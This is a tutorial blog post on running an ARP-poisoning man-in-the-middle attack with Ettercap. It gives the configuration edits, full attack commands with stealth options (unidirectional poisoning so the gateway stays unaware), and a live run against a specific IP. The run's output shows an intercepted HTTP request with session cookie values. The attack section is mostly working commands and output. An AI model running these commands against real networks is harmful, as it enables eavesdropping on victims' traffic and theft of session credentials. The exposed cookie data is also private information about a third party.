Man-In-The-Middle Attacks With Ettercap
Contents
Introduction
This post explains how to execute a man-in-the-middle attack on Linux. Only the actual attack is described here. The mechanisms of ARP poisoning and man-in-the-middle attacks are explained in a different post.
-
- A man-in-the-middle attack. It can be achieved in various ways, but MITM through ARP poisoning is a common method.
In this post we demonstrate a MITM with the Ettercap tool. Ettercap is a multipurpose sniffer/interceptor/logger for switched LAN, and pretty much the Swiss army knife of ARP poisoning. Every security researcher should include it in his toolbox, and it is included in the Backtrack Linux distribution. Ettercap features a pretty nice GUI, but in this post we only use the text mode.
Command Syntax
The ettercap program has the following syntax:
ettercap [OPTIONS] [TARGET1] [TARGET2]
The targets can be IPs and MACs, and specific TCP and UDP ports can also be targetted. A simple description of the TARGET1 and TARGET2 syntax is given below. Read the target specification section on the man page for details.
TARGET is in the form MAC/IPs/PORTs. If you omit any of the parts, it means a wildcard is used for that part. Examples: //80 means ANY mac address, ANY ip and ONLY port 80 /10.0.0.1/ means ANY mac address, ONLY ip 10.0.0.1 and ANY port
Useful command line options are:
| Parameter | Description | Required |
|---|---|---|
| -T -G -D |
Use console interface Use the GTK+ GUI Daemonize (no interface) |
Yes, choose one |
| -q | Quiet mode. It can be used only in conjunction with the console interface. It does not print packet content. | No |
| -i |
Use the specified interface | No |
| -M |
Start a MITM attack using the provided parameters. The possible methods are arp, dhcp, icmp and port. | No |
| -M arp[:args] | Start an ARP MITM attack. The arguments are described below. | No |
Ettercap Configuration
If you do a MITM attack with ettercap, it will have to ‘forward’ packets from the victim to the correct destination, and the other way around. In order for this to work you need to change your configuration file:
$ nano /usr/local/etc/etter.conf
Look for the following lines in the file, and uncomment them by removing the hashes (except for the one next to “if”). Save and close the file.
Change:
# if you use iptables: #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
To this:
# if you use iptables: redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
For ARP poisoning attacks, the configuration file has a lot of options. You should only change these if you know what you are doing. One example is the arp_poision_delay configuration option, which changes the interval with which ettercap re-spoofs the victim(s) during an ARP MITM attack:
arp_poison_warm_up = 1 # seconds arp_poison_delay = 10 # seconds
The arp_poison_warm_up variable is the interval between the first five spoofed ARP packets. After that, the interval between the packets changes to arp_poison_delay.
Examples
We have an example scenario:
| Host | Details |
|---|---|
| Attacker (the host running ettercap) | MAC=22:22:22:22:22:22 |
| Victim | IP=1.2.3.4 |
| Gateway | IP=1.2.0.0 |
All these hosts are in the same subnet (switched network). Remember that this is required for ARP communication.
MITM on an Entire Subnet (not recommended)
ettercap -T -M arp // //
This is what the command line options do:
-T |
Tells ettercap to use the text interface |
-M |
Tells ettercap to execute a MITM attack. |
arp |
Denotes ARP poisoning should be used to perform the attack. |
// // |
Tells ettercap that TARGET1 and TARGET2 consist of all hosts in the subnet. |
The result is that for every combination of hosts in the subnet, both sides have their ARP cache poisoned. If there are 100 hosts in the subnet, this will cause a storm of 20,000 ARP packets to be sent. When successful, all network traffic will pass through the attacker’s system. I suggest only doing this on the smallest of networks.
Unidirectional MITM: Victim to Gateway
A more sensible and stealthy command is:
ettercap -T -M arp:oneway,remote /1.2.3.4/ /1.2.0.0/
This is what the command line options mean:
-T |
Tells ettercap to use the text interface |
-M |
Tells ettercap to execute a MITM attack. |
arp |
Denotes ARP poisoning should be used to perform the attack. |
oneway |
The oneway option of the arp method specifies that the poisoning should be unidirectional: only from TARGET1 to TARGET2. Poisoning normal clients is less risky than a gateway where an ARP watcher could be in place. By putting the gateway in TARGET2, it remains oblivious to the attack. |
remote |
The remote option of the arp method tells ettercap to not only sniff direct connections between TARGET1 and TARGET2, but also connections that pass through a TARGET to a remote IP, i.e. if one of the hosts is a gateway. |
/1.2.3.4/ |
This tells ettercap that TARGET1 is the IP 1.2.3.4. The ARP cache of this host will be targeted. |
/1.2.0.0/ |
This tells ettercap that TARGET2 is the IP 1.2.0.0. Because of the oneway directive this host is not poisoned. |
Here is what the command does:
- First, the TARGET ranges are scanned with ARP requests to find all active hosts and corresponding MAC addresses. In this case there is only one host per range: 1.2.3.4 in GROUP1 and 1.2.0.0 in GROUP2.
- Then all possible GROUP1 and GROUP2 combinations are spoofed. The only combination is 1.2.3.4 – 1.2.0.0 , and because of the oneway argument only the ARP cache of 1.2.3.4is poisoned:
- Ettercap first sends a spoofed ICMP echo request (from IP 1.2.0.0) to force the ARP entry in the cache. Then it immediately sends a spoofed ARP reply to the victim at 1.2.3.4, containing the gateway IP 1.2.0.0 and the attacker’s MAC address 22:22:22:22:22:22. The victim updates its ARP cache, and any packets that it thinks it sends to the gateway are actually transmitted to the attacker.
- Ettercap automatically sniffs all traffic from victim to gateway, then it forwards it to the gateway. Traffic in the other direction (gateway->victim) does not pass through the attacker, so that cannot be sniffed.
Sniffing with a Filter
If your host is acting as a gateway, ettercap can sniff the traffic that passes through it.
ettercap -T -z --proto tcp -f "src host 1.2.3.4 or port 80" //
Use the above syntax to listen for and display all IP traffic with source IP 1.2.3.4 or src/destination port 80.
-T |
Tells ettercap to use the text interface |
-z |
Silent mode. Tells ettercap to skip the initial ARP scan of the entire subnet (it does this even before sniffing) |
--proto tcp |
Tells ettercap to only sniff TCP traffic |
-f "src host 1.2.3.4 or port 80" |
Tells ettercap to apply the specified libpcap filter to the traffic |
// |
Tells ettercap that we want to look at traffic from the entire subnet |
In Practice
Find the IP of the default gateway (router):
$ route -n Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface 132.49.120.0 0.0.0.0 255.255.240.0 U 0 0 0 eth0 0.0.0.0 132.49.120.1 0.0.0.0 UG 100 0 0 eth0
Attack the host with IP 132.49.120.168.
$ sudo ettercap -T -M arp:oneway,remote /132.49.120.168/ /132.49.120.1/
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Listening on eth0... (Ethernet)
eth0 -> 00:01:40:34:A1:92 132.49.120.121 255.255.240.0
Privileges dropped to UID 65534 GID 65534...
28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Scanning for merged targets (2 hosts)...
* |==================================================>| 100.00 %
2 hosts added to the hosts list...
ARP poisoning victims:
GROUP 1 : 132.49.120.168 00:2B:4D:11:66:30
GROUP 2 : 132.49.120.1 00:00:0C:07:AC:00
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
Mon Jun 20 14:08:31 2011
TCP 132.89.120.168:8304 --> 83.143.78.29:80 | AP
tSuite/TestController.asp?TestTypeID=,8,12,.
Cookie: ASPSESSIONIDAASASSDC=ICEHOOJDKFAIDEPINIGONNAJ; __utma=236849091.1657384024.1308593949.1308593949.1308593949.1; __utmb=236849091; __utmc=236849091; __utmz=236849091.1308593949.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none).
.
../...3C..e.._.......:..Q4.|.'...+h.(.nj.T..f0..-.5..mF.8^T=n[IK{9T..F...I(.!~6....4O.J.uaH...-..S......e..76wJ..u..Es.....4..}}'.N....F.......:.~j...M^.....W......tC.....v.s..%..b.Z..T7u./....!..C*...x...0e...5.#..n..Q.X..&r..>.&T.lz../.Z2T.".NKi...a.q......."....b+........-.:....j......e=. ~Xj.5.|,.. .,a...z|....LP,..>.......).u.......
We are now picking up the traffic between our victim and some website (the above packet looks like HTTP traffic).
Thanks for the help, script works a treat. –